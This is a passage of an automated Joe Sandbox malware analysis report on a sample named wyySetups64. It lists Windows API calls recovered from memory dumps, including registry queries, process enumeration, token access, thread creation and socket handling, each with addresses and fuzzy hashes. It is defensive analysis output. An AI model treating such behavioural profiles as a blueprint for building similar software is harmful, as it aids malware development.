                                                                                                                                                                                                              • CloseHandle.KERNEL32(?,?,?,?,?,?,00000000,033910DB,000000FF), ref: 03376A34
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4120084885.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4120084885.00000000033A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_3370000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CloseHandleProcess$OpenString$CurrentToken
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 429299433-0
                                                                                                                                                                                                              • Opcode ID: f91e6cde62eecbf209dc3c174c01d60f130d5ae192f8c5d7febd46e9351a83c2
                                                                                                                                                                                                              • Instruction ID: 6328903e239417cd76b26e5ae502da2bf47479f5dbedc80b303f8d784c3b9a35
                                                                                                                                                                                                              • Opcode Fuzzy Hash: f91e6cde62eecbf209dc3c174c01d60f130d5ae192f8c5d7febd46e9351a83c2
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 834195B2D00A18EBDB20DFA8CCC1AAFF7B8FB45710F14456AE955F7241D77999008BA0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • _memset.LIBCMT ref: 03376DD9
                                                                                                                                                                                                              • RegOpenKeyExW.KERNEL32(80000001,03395164,00000000,00020019,75BF73E0), ref: 03376DFC
                                                                                                                                                                                                              • RegQueryValueExW.KERNEL32(75BF73E0,GROUP,00000000,00000001,?,00000208), ref: 03376E4A
                                                                                                                                                                                                              • lstrcmpW.KERNEL32(?,03395148), ref: 03376E60
                                                                                                                                                                                                              • lstrcpyW.KERNEL32(033756EA,?), ref: 03376E72
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4120084885.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4120084885.00000000033A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_3370000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: OpenQueryValue_memsetlstrcmplstrcpy
                                                                                                                                                                                                              • String ID: GROUP
                                                                                                                                                                                                              • API String ID: 2102619503-2593425013
                                                                                                                                                                                                              • Opcode ID: 872144275fe10206fbf196322535d4108f838da11b7592d7dc7775a15a14811b
                                                                                                                                                                                                              • Instruction ID: 724a5ccd3d7a15a801b67ac606975b6e7e64df946da747b95667bd0396c3027e
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 872144275fe10206fbf196322535d4108f838da11b7592d7dc7775a15a14811b
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 59318771900719FBDB30DF90DDC9B9EB7B8FB08710F100299E515A6290DB799A84CF60
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • ___set_flsgetvalue.LIBCMT ref: 00BD7240
                                                                                                                                                                                                              • __calloc_crt.LIBCMT ref: 00BD724C
                                                                                                                                                                                                              • __getptd.LIBCMT ref: 00BD7259
                                                                                                                                                                                                              • CreateThread.KERNEL32(?,?,00BD71B6,00000000,?,?), ref: 00BD7290
                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 00BD729A
                                                                                                                                                                                                              • _free.LIBCMT ref: 00BD72A3
                                                                                                                                                                                                              • __dosmaperr.LIBCMT ref: 00BD72AE
                                                                                                                                                                                                                • Part of subcall function 00BD710D: __getptd_noexit.LIBCMT ref: 00BD710D
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4116723964.0000000000BD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116694335.0000000000BD0000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116886071.0000000000BE5000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116935852.0000000000BE9000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116976160.0000000000BEF000.00000020.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.4117023604.0000000000BF1000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_bd0000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CreateErrorLastThread___set_flsgetvalue__calloc_crt__dosmaperr__getptd__getptd_noexit_free
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 155776804-0
                                                                                                                                                                                                              • Opcode ID: 1ec73021328d69cd22697e2f1fd6dcf989e4304dae29b2b74e98db30381b5018
                                                                                                                                                                                                              • Instruction ID: 0c8149795ece71288e7c399023b0dbc849954ea99690fcd309aba9149de6e864
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1ec73021328d69cd22697e2f1fd6dcf989e4304dae29b2b74e98db30381b5018
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 121182322487866FD721AFA59C429DBB7E8EF46774B1001ABF9549A352FF71D80086A0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • ___set_flsgetvalue.LIBCMT ref: 0337FA4E
                                                                                                                                                                                                              • __calloc_crt.LIBCMT ref: 0337FA5A
                                                                                                                                                                                                              • __getptd.LIBCMT ref: 0337FA67
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,0337F9C4,00000000,00000000,0337E003), ref: 0337FA9E
                                                                                                                                                                                                              • GetLastError.KERNEL32(?,00000000,?,?,0337E003,00000000,00000000,03375F40,00000000,00000000,00000000), ref: 0337FAA8
                                                                                                                                                                                                              • _free.LIBCMT ref: 0337FAB1
                                                                                                                                                                                                              • __dosmaperr.LIBCMT ref: 0337FABC
                                                                                                                                                                                                                • Part of subcall function 0337F91B: __getptd_noexit.LIBCMT ref: 0337F91B
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4120084885.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4120084885.00000000033A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_3370000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CreateErrorLastThread___set_flsgetvalue__calloc_crt__dosmaperr__getptd__getptd_noexit_free
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 155776804-0
                                                                                                                                                                                                              • Opcode ID: 10eec96f844a7bbca7101e3a0777e2e36d0e1b7c25120931fd2b53bdc6f0ad4c
                                                                                                                                                                                                              • Instruction ID: e3e889aa16e0aab349f463393097d176d71d02a0a0075040514f523adeb46a71
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 10eec96f844a7bbca7101e3a0777e2e36d0e1b7c25120931fd2b53bdc6f0ad4c
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7311C23A60470ABFDB21FFA9ECC099B37D9EF05B70B140426F9048A150DB79D401CA60
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetModuleHandleW.KERNEL32(kernel32.dll,GetNativeSystemInfo,?,?,?,?,?,?,?,?,03377523), ref: 0337743D
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 03377444
                                                                                                                                                                                                              • GetNativeSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,03377523), ref: 03377452
                                                                                                                                                                                                              • GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,03377523), ref: 0337745A
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4120084885.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4120084885.00000000033A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_3370000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: InfoSystem$AddressHandleModuleNativeProc
                                                                                                                                                                                                              • String ID: GetNativeSystemInfo$kernel32.dll
                                                                                                                                                                                                              • API String ID: 3433367815-192647395
                                                                                                                                                                                                              • Opcode ID: 38fc90cde7c4b3d8dc46a67fd8c6dbe680d0e7df171acb8db158fc26a00115b3
                                                                                                                                                                                                              • Instruction ID: 0ccbc27dd8e2e58fdc8cf9091cc2cdd48464bca267ef19b199546b9387332506
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 38fc90cde7c4b3d8dc46a67fd8c6dbe680d0e7df171acb8db158fc26a00115b3
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 04012C70D00209AFDF60DFB499846FEBBF9EB08300F5445AAD559E3240E63A8A50CBA1
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • ___set_flsgetvalue.LIBCMT ref: 00BD71BC
                                                                                                                                                                                                                • Part of subcall function 00BD9754: TlsGetValue.KERNEL32(00000000,00BD98AD,?,00BD9FB0,00000000,00000001,00000000,?,00BDC0CF,00000018,00BE7C70,0000000C,00BDC15F,00000000,00000000), ref: 00BD975D
                                                                                                                                                                                                                • Part of subcall function 00BD9754: DecodePointer.KERNEL32(?,00BD9FB0,00000000,00000001,00000000,?,00BDC0CF,00000018,00BE7C70,0000000C,00BDC15F,00000000,00000000,?,00BD99BA,0000000D), ref: 00BD976F
                                                                                                                                                                                                                • Part of subcall function 00BD9754: TlsSetValue.KERNEL32(00000000,?,00BD9FB0,00000000,00000001,00000000,?,00BDC0CF,00000018,00BE7C70,0000000C,00BDC15F,00000000,00000000,?,00BD99BA), ref: 00BD977E
                                                                                                                                                                                                              • ___fls_getvalue@4.LIBCMT ref: 00BD71C7
                                                                                                                                                                                                                • Part of subcall function 00BD9734: TlsGetValue.KERNEL32(?,?,00BD71CC,00000000), ref: 00BD9742
                                                                                                                                                                                                              • ___fls_setvalue@8.LIBCMT ref: 00BD71DA
                                                                                                                                                                                                                • Part of subcall function 00BD9788: DecodePointer.KERNEL32(?,?,?,00BD71DF,00000000,?,00000000), ref: 00BD9799
                                                                                                                                                                                                              • GetLastError.KERNEL32(00000000,?,00000000), ref: 00BD71E3
                                                                                                                                                                                                              • ExitThread.KERNEL32 ref: 00BD71EA
                                                                                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 00BD71F0
                                                                                                                                                                                                              • __freefls@4.LIBCMT ref: 00BD7210
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4116723964.0000000000BD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116694335.0000000000BD0000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116886071.0000000000BE5000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116935852.0000000000BE9000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116976160.0000000000BEF000.00000020.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.4117023604.0000000000BF1000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_bd0000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Value$DecodePointerThread$CurrentErrorExitLast___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2383549826-0
                                                                                                                                                                                                              • Opcode ID: 55757018adbb51d8363c8564fd5dd641374c250f0aeb25f7231cb68537a3411b
                                                                                                                                                                                                              • Instruction ID: 34d63f46497564e605a4afa917c63793c667c52f3582c45b811becc7621cf77a
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 55757018adbb51d8363c8564fd5dd641374c250f0aeb25f7231cb68537a3411b
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4DF09675504645ABC714BF71C94988EFBE9AF4431471085DAF9049B313FF34DC428790
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • ___set_flsgetvalue.LIBCMT ref: 0337F9CA
                                                                                                                                                                                                                • Part of subcall function 03383CA0: TlsGetValue.KERNEL32(00000000,03383DF9,?,03384500,00000000,00000001,00000000,?,03388DE6,00000018,03396448,0000000C,03388E76,00000000,00000000), ref: 03383CA9
                                                                                                                                                                                                                • Part of subcall function 03383CA0: DecodePointer.KERNEL32(?,03384500,00000000,00000001,00000000,?,03388DE6,00000018,03396448,0000000C,03388E76,00000000,00000000,?,03383F06,0000000D), ref: 03383CBB
                                                                                                                                                                                                                • Part of subcall function 03383CA0: TlsSetValue.KERNEL32(00000000,?,03384500,00000000,00000001,00000000,?,03388DE6,00000018,03396448,0000000C,03388E76,00000000,00000000,?,03383F06), ref: 03383CCA
                                                                                                                                                                                                              • ___fls_getvalue@4.LIBCMT ref: 0337F9D5
                                                                                                                                                                                                                • Part of subcall function 03383C80: TlsGetValue.KERNEL32(?,?,0337F9DA,00000000), ref: 03383C8E
                                                                                                                                                                                                              • ___fls_setvalue@8.LIBCMT ref: 0337F9E8
                                                                                                                                                                                                                • Part of subcall function 03383CD4: DecodePointer.KERNEL32(?,?,?,0337F9ED,00000000,?,00000000), ref: 03383CE5
                                                                                                                                                                                                              • GetLastError.KERNEL32(00000000,?,00000000), ref: 0337F9F1
                                                                                                                                                                                                              • ExitThread.KERNEL32 ref: 0337F9F8
                                                                                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 0337F9FE
                                                                                                                                                                                                              • __freefls@4.LIBCMT ref: 0337FA1E
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4120084885.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4120084885.00000000033A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_3370000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Value$DecodePointerThread$CurrentErrorExitLast___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2383549826-0
                                                                                                                                                                                                              • Opcode ID: dbe9f57b44814a8a9a10d0e9cccc4158639017970fc91b205d317af88606f32b
                                                                                                                                                                                                              • Instruction ID: 1fbe747045e7b6e5f73480055629470e12b370b4aba16c85cd3c8dac5f1e86eb
                                                                                                                                                                                                              • Opcode Fuzzy Hash: dbe9f57b44814a8a9a10d0e9cccc4158639017970fc91b205d317af88606f32b
                                                                                                                                                                                                              • Instruction Fuzzy Hash: BFF06D7CA00708BBC718FF70C9C880E7BBCBF896507218458E9098F311DA39D442CBA1
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • _memset.LIBCMT ref: 0337607C
                                                                                                                                                                                                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,?,00000000), ref: 03376088
                                                                                                                                                                                                              • Process32FirstW.KERNEL32(00000000,00000000), ref: 033760B9
                                                                                                                                                                                                              • Process32NextW.KERNEL32(00000000,0000022C), ref: 0337610F
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,00000000), ref: 03376116
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4120084885.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4120084885.00000000033A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_3370000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memset
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2526126748-0
                                                                                                                                                                                                              • Opcode ID: 73a77b38d663315ee2e38565d1c8ef4f334b0077454e91676d7cb3d6e463910d
                                                                                                                                                                                                              • Instruction ID: 7c2189740e195be21ac2988f8cd03b5fb2675c0e85393527883d58c83627630e
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 73a77b38d663315ee2e38565d1c8ef4f334b0077454e91676d7cb3d6e463910d
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5B21B731A05518EBDB30EF64DCEABEAB36DEF14310F044699DD0A97281EB3A9A14C650
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00BD32F1
                                                                                                                                                                                                              • Sleep.KERNEL32(00000258), ref: 00BD32FE
                                                                                                                                                                                                              • InterlockedExchange.KERNEL32(?,00000000), ref: 00BD3306
                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00BD3312
                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00BD331A
                                                                                                                                                                                                              • Sleep.KERNEL32(0000012C), ref: 00BD332B
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4116723964.0000000000BD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116694335.0000000000BD0000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116886071.0000000000BE5000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116935852.0000000000BE9000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116976160.0000000000BEF000.00000020.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.4117023604.0000000000BF1000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_bd0000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ObjectSingleWait$Sleep$ExchangeInterlocked
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3137405945-0
                                                                                                                                                                                                              • Opcode ID: eeaf42913bc0361ad0ff03f47fde89b3ee150f09ffa530784b02bea49ed491fa
                                                                                                                                                                                                              • Instruction ID: 204b7b26cbd746a4e0927def32958b08ff523a86b51ca62824c25487ef2bf225
                                                                                                                                                                                                              • Opcode Fuzzy Hash: eeaf42913bc0361ad0ff03f47fde89b3ee150f09ffa530784b02bea49ed491fa
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 73F08272204704ABD620ABA9DCC4E46F3A8AF85335B204709F221872E1CEB0E8018BA4
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CoInitialize.OLE32(00000000), ref: 0337669B
                                                                                                                                                                                                              • CoCreateInstance.OLE32(033946FC,00000000,00000001,0339471C,?,?,?,?,?,?,?,?,?,?,0337588A), ref: 033766B2
                                                                                                                                                                                                              • SysFreeString.OLEAUT32(?), ref: 0337674C
                                                                                                                                                                                                              • CoUninitialize.OLE32(?,?,?,?,?,?,?,?,?,0337588A), ref: 0337677D
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4120084885.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4120084885.00000000033A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_3370000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CreateFreeInitializeInstanceStringUninitialize
                                                                                                                                                                                                              • String ID: FriendlyName
                                                                                                                                                                                                              • API String ID: 841178590-3623505368
                                                                                                                                                                                                              • Opcode ID: 4c82ff938879c994aefc5f230fb8cd5c7d45b488763c1cb8060677a2225bddad
                                                                                                                                                                                                              • Instruction ID: 4739705154b5d737cf07e3d7ad0976ffba3a7f174db508345e23ce4875d4a688
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4c82ff938879c994aefc5f230fb8cd5c7d45b488763c1cb8060677a2225bddad
                                                                                                                                                                                                              • Instruction Fuzzy Hash: DE31577560060AAFDB10DB99CCD1EAEB7BDEF88700F148589F514EB250DA71E942CB60
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • _malloc.LIBCMT ref: 0337F721
                                                                                                                                                                                                                • Part of subcall function 0337F673: __FF_MSGBANNER.LIBCMT ref: 0337F68C
                                                                                                                                                                                                                • Part of subcall function 0337F673: __NMSG_WRITE.LIBCMT ref: 0337F693
                                                                                                                                                                                                                • Part of subcall function 0337F673: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,03384500,00000000,00000001,00000000,?,03388DE6,00000018,03396448,0000000C,03388E76), ref: 0337F6B8
                                                                                                                                                                                                              • std::exception::exception.LIBCMT ref: 0337F756
                                                                                                                                                                                                              • std::exception::exception.LIBCMT ref: 0337F770
                                                                                                                                                                                                              • __CxxThrowException@8.LIBCMT ref: 0337F781
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4120084885.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4120084885.00000000033A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_3370000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: std::exception::exception$AllocateException@8HeapThrow_malloc
                                                                                                                                                                                                              • String ID: bad allocation
                                                                                                                                                                                                              • API String ID: 615853336-2104205924
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • setsockopt.WS2_32(?,0000FFFF,00000080,?,00000004), ref: 00BD2D3C
                                                                                                                                                                                                              • CancelIo.KERNEL32(?), ref: 00BD2D46
                                                                                                                                                                                                              • InterlockedExchange.KERNEL32(00000000,00000000), ref: 00BD2D4F
                                                                                                                                                                                                              • closesocket.WS2_32(?), ref: 00BD2D59
                                                                                                                                                                                                              • SetEvent.KERNEL32(00000001), ref: 00BD2D63
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4116723964.0000000000BD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: true
• Associated: 00000001.00000002.4116694335.0000000000BD0000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.4116886071.0000000000BE5000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.4116935852.0000000000BE9000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.4116976160.0000000000BEF000.00000020.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.4117023604.0000000000BF1000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_bd0000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CancelEventExchangeInterlockedclosesocketsetsockopt
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1486965892-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • _malloc.LIBCMT ref: 00BD6F31
                                                                                                                                                                                                                • Part of subcall function 00BD6E83: __FF_MSGBANNER.LIBCMT ref: 00BD6E9C
                                                                                                                                                                                                                • Part of subcall function 00BD6E83: __NMSG_WRITE.LIBCMT ref: 00BD6EA3
                                                                                                                                                                                                                • Part of subcall function 00BD6E83: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,00BD9FB0,00000000,00000001,00000000,?,00BDC0CF,00000018,00BE7C70,0000000C,00BDC15F), ref: 00BD6EC8
                                                                                                                                                                                                              • std::exception::exception.LIBCMT ref: 00BD6F66
                                                                                                                                                                                                              • std::exception::exception.LIBCMT ref: 00BD6F80
                                                                                                                                                                                                              • __CxxThrowException@8.LIBCMT ref: 00BD6F91
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4116723964.0000000000BD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: true
• Associated: 00000001.00000002.4116694335.0000000000BD0000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.4116886071.0000000000BE5000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.4116935852.0000000000BE9000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.4116976160.0000000000BEF000.00000020.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.4117023604.0000000000BF1000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_bd0000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: std::exception::exception$AllocateException@8HeapThrow_malloc
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 615853336-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 0337316B
                                                                                                                                                                                                              • InterlockedExchange.KERNEL32(?,00000001), ref: 03373183
                                                                                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 0337322F
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4120084885.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
• Associated: 00000001.00000002.4120084885.00000000033A4000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_3370000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CurrentThread$ExchangeInterlocked
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 4033114805-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • __floor_pentium4.LIBCMT ref: 00BD11E9
                                                                                                                                                                                                              • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 00BD1226
                                                                                                                                                                                                              • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 00BD1255
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4116723964.0000000000BD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: true
• Associated: 00000001.00000002.4116694335.0000000000BD0000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.4116886071.0000000000BE5000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.4116935852.0000000000BE9000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.4116976160.0000000000BEF000.00000020.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.4117023604.0000000000BF1000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_bd0000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Virtual$AllocFree__floor_pentium4
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2605973128-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • __floor_pentium4.LIBCMT ref: 033711E9
                                                                                                                                                                                                              • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 03371226
                                                                                                                                                                                                              • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 03371255
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4120084885.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
• Associated: 00000001.00000002.4120084885.00000000033A4000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_3370000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Virtual$AllocFree__floor_pentium4
